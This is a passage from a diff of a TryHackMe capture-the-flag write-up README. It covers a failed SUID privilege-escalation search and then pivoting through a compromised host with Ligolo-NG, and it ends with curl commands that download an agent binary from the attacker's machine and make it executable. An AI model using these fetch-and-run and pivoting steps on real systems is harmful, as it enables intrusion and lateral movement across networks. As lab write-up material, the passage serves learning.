zinzloun/THM_WriteUP/README.md

     ...

 Nothing really interesting emerged.
 I searched for SUID file, but again, with no luck:

     find / -perm -u=s -type f 2>/dev/null
+    ...

-Performing other activities to find a way to escalate my privilege, but I didn't find anything
+Performing other activities to find a way to escalate my privilege, but I didn't find anything.

 ### Pivoting
-At this point I decided to move forward and perform an host scan on the subnet using the compromised machine as pivot host.
+At this point I decided to move forward and perform an hosts scan on the subnet  192.168.100.0/24 using the compromised machine as pivot host.
 As usual to perform this task I use Ligolo-NG.
 I downloaded the agent from attacker machine, since wget it's not installed I used curl:

     cd /tmp && curl -O http://10.50.74.35:8000/agent
     chmod u+x agent